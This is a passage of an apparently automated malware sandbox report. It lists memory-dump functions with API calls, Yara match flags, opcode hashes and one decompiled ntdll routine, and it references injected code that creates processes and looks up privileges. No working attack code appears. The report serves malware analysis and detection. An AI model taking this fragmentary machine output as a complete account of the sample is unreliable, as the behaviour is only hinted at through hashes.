                                          Uniqueness Score: -1.00%

                                          Function 02AC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 531901ff3dea39fc773be9d05a53ee9f0b731502c301f20dee428f87af1ad22a
                                          • Instruction ID: 2360291d9b5c4b7e45c4fe1af4d526b9a9555280216ba98491a1b426b95ea7bf
                                          • Opcode Fuzzy Hash: 531901ff3dea39fc773be9d05a53ee9f0b731502c301f20dee428f87af1ad22a
                                          • Instruction Fuzzy Hash: 8290027624140402D10065A95408647000597E0341F51D411A5024555ECAA588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4086dde0165b1bc1adc368e746d1a2bdba781062deb569bb6f65c25dcb3856b6
                                          • Instruction ID: 7fce5048d9094a12ee642467df8010079ce5894e8ebe09c0d915e81ce9ee1164
                                          • Opcode Fuzzy Hash: 4086dde0165b1bc1adc368e746d1a2bdba781062deb569bb6f65c25dcb3856b6
                                          • Instruction Fuzzy Hash: F490027624140413D11161694504707000997D0281F91C812A0424558D9A968952B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc9f5ba0644ba4e12fafc2b38cc53062608d964d7e2c761e3e682d770077c728
                                          • Instruction ID: 676d6eb94cd5ade0879c0911d025c83929c15aac8b9e590ac8f7a1858ec4807d
                                          • Opcode Fuzzy Hash: bc9f5ba0644ba4e12fafc2b38cc53062608d964d7e2c761e3e682d770077c728
                                          • Instruction Fuzzy Hash: DE900266282441525545B16944045074006A7E0281B91C412A1414950C89669856E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8b7a303e28027d59616a66a11e47097e25a10123bbeb3745e106307a4ee572e5
                                          • Instruction ID: 87d735c1117ff2b2cc2b7ac751d05b487336b625fa64679eab1f6bff67ec1dbc
                                          • Opcode Fuzzy Hash: 8b7a303e28027d59616a66a11e47097e25a10123bbeb3745e106307a4ee572e5
                                          • Instruction Fuzzy Hash: 899002A638140442D10061694414B070005D7E1341F51C415E1064554D8A59CC527166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2007aa31f9218a3ce652379ab9ebac4cb7e308686636ecd2dc865f8e6fbb1cd8
                                          • Instruction ID: a52d83387897849e37d5c3432dc6873b275cd804ea6732d6e1e1c54f92e9b0cc
                                          • Opcode Fuzzy Hash: 2007aa31f9218a3ce652379ab9ebac4cb7e308686636ecd2dc865f8e6fbb1cd8
                                          • Instruction Fuzzy Hash: B19002A624240003410571694414617400A97E0241F51C421E1014590DC96588917165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6d7400a4810ec0989654f157428072331412a6be571ae879740cf968086bad42
                                          • Instruction ID: edb02c5c8d3b2ed446ec87eabe2f0181838b2b1131261f43626855154f394cd7
                                          • Opcode Fuzzy Hash: 6d7400a4810ec0989654f157428072331412a6be571ae879740cf968086bad42
                                          • Instruction Fuzzy Hash: 1A9002B624140402D14071694404747000597D0341F51C411A5064554E8A998DD576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a1720d9806a56f5eff1cc220c5aef5fe1214dcf0c9481f0289ebd9e2e8661d04
                                          • Instruction ID: 94c9403591fdd915b09a6555e3695fa13790b944707d907e2482b96075679d25
                                          • Opcode Fuzzy Hash: a1720d9806a56f5eff1cc220c5aef5fe1214dcf0c9481f0289ebd9e2e8661d04
                                          • Instruction Fuzzy Hash: 8490047F351400030105F57D07045070047D7D53D1751C431F1015550CDF71CC717171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA05C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA08D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: d225ceec34aef379c0bb336316a25421d5e6ba47c47aecbc75a9a62c3b516e34
                                          • Instruction ID: b3d9fad1b9418f5799d9e6b9af6e0f7226f819ec5575e7e0be588d4a58cb4f7d
                                          • Opcode Fuzzy Hash: d225ceec34aef379c0bb336316a25421d5e6ba47c47aecbc75a9a62c3b516e34
                                          • Instruction Fuzzy Hash: F8E012B5200218ABDB18EF99CC49EA737A9EF88750F018558FA585B282C630E9108BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA08D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: da6c721836354c363b3eccaf107d5375b3dd49d66906421d0be769ab0b106ad3
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 22E012B1200208ABDB18EF99CC49EA777ACAF88750F018558FA585B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001A82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001A834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001A836B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                                          • Instruction ID: dac7531945c7a97152ef7e14cc8be45cdd980085b321048cc7166751158e774f
                                          • Opcode Fuzzy Hash: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                                          • Instruction Fuzzy Hash: 94018431A802287BEB20A6949C43FFF766C6F51B50F044118FF04BA1C2E794690546E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001AAD32
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction ID: f8f47c8c16339d480c2e9fdcf56e5ee1cb037aeb629421ebbcc1166acb0cb0a0
                                          • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction Fuzzy Hash: 91011EB9D4020DABDB10EAE4DC42FDDB778AF54308F4041A5E90997241F731EB54CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA124
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 1f16651aa1e33bb1ece4c75c060fb5250ceeca3f2cd44afc2d59df99ac92dd6f
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: DE01B2B2210208BFCB54DF89DC81EEB77ADAF8C754F158258FA4D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA0CD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA124
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 89c15d938acf1ff45882b64cec5cadb26f9b8a4fde8ae9c5dcf628a0cf045502
                                          • Instruction ID: 0f28caa0ec2e055753922c91badf63677a23be0ecc31009aa7c048687c61d91b
                                          • Opcode Fuzzy Hash: 89c15d938acf1ff45882b64cec5cadb26f9b8a4fde8ae9c5dcf628a0cf045502
                                          • Instruction Fuzzy Hash: 9901EFB6214248AFCB04DF98DC80DEB37A9AF8C314F158258FA9997201C630E8418BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA1BA, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,001AF192,001AF192,?,00000000,?,?), ref: 001BA1F0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 5da8fa9c80f9e53f2af8007c2145c1ee774b294f950949583ce6c0d65ec1bf70
                                          • Instruction ID: b3863021efe81ad3b61175ba98ac57adfa5395ed01734908d54a06314d46ad06
                                          • Opcode Fuzzy Hash: 5da8fa9c80f9e53f2af8007c2145c1ee774b294f950949583ce6c0d65ec1bf70
                                          • Instruction Fuzzy Hash: 56E092B1200204BFDB10DF94CC81EDB3769EF49350F018154FA0C97241C630E800CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(001B44F6,?,001B4C6F,001B4C6F,?,001B44F6,?,?,?,?,?,00000000,00000000,?), ref: 001BA04D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: a335e8bd4cefdf9a0672ff3526d47fd15f7089137487bf2d20fbe5ce2a2e76e0
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99CC41EA777ACAF88654F118558FA585B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,001AF192,001AF192,?,00000000,?,?), ref: 001BA1F0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: d7955b1eeb75c49c03ad95cfd64a554b724bed52e6ce6d98e43ac97c23384bef
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 65E01AB12002086BDB10DF49CC85EE737ADAF88650F018154FA4C57241CA30E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AF687, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8CF4,?), ref: 001AF6BB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: f825199019b07f0b644c2fbec1767a0a02156adaa6b29b153c79c8e65f2d5086
                                          • Instruction ID: 6f29af249eeeb3b7dca9d0a74b7d708ed28451424a5789e948746b33dda6cd5a
                                          • Opcode Fuzzy Hash: f825199019b07f0b644c2fbec1767a0a02156adaa6b29b153c79c8e65f2d5086
                                          • Instruction Fuzzy Hash: E8E0CDA56E43481EE710ABF05C03B5237845B01310F050578E449EF183D75CD0164125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AF690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8CF4,?), ref: 001AF6BB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction ID: 1be4f19b9694b01db887fdc86b8e41366176560e11496f55cd0fafe1b80c0d6d
                                          • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction Fuzzy Hash: A3D052766903082BEA10AAA99C03FA63288AB55B00F494068FA48AA2C3EA64E4018165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02AC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4cd8cd87dca78ae75bb436302761436229aa52abf708579a153baee7dcf134dd
                                          • Instruction ID: 75243f3d15e3c845fa8d44e2521cd7a254df0aa2feb77796ed2f041dde3517f6
                                          • Opcode Fuzzy Hash: 4cd8cd87dca78ae75bb436302761436229aa52abf708579a153baee7dcf134dd
                                          • Instruction Fuzzy Hash: 9AB09B729414C5C5D611E7704608727794077D0741F26C455D1030645A4B78C091F6B6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 02B1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E02B1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02ACCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02B15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02B15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x02b1fdda
                                          0x02b1fde2
                                          0x02b1fde5
                                          0x02b1fdec
                                          0x02b1fdfa
                                          0x02b1fdff
                                          0x02b1fe0a
                                          0x02b1fe0f
                                          0x02b1fe17
                                          0x02b1fe1e
                                          0x02b1fe19
                                          0x02b1fe19
                                          0x02b1fe19
                                          0x02b1fe20
                                          0x02b1fe21
                                          0x02b1fe22
                                          0x02b1fe25
                                          0x02b1fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B1FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B1FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B1FE01
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.496528037.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true
                                          • Associated: 00000013.00000002.497189560.0000000002B7B000.00000040.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 156a8219bdbf98a6f4e3e74232fe676ad6c1df0e78ede5b9fa3727ab63f3ced6
                                          • Instruction ID: d1a2bfb59c17bd235daa17f45a1a8a1c2ecc4fc4d0fe2933f5345855851973a9
                                          • Opcode Fuzzy Hash: 156a8219bdbf98a6f4e3e74232fe676ad6c1df0e78ede5b9fa3727ab63f3ced6
                                          • Instruction Fuzzy Hash: 73F0CD72240201BBEA311A55DC02F23BB6BEB84730F640255FA28565E1EA62A860DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%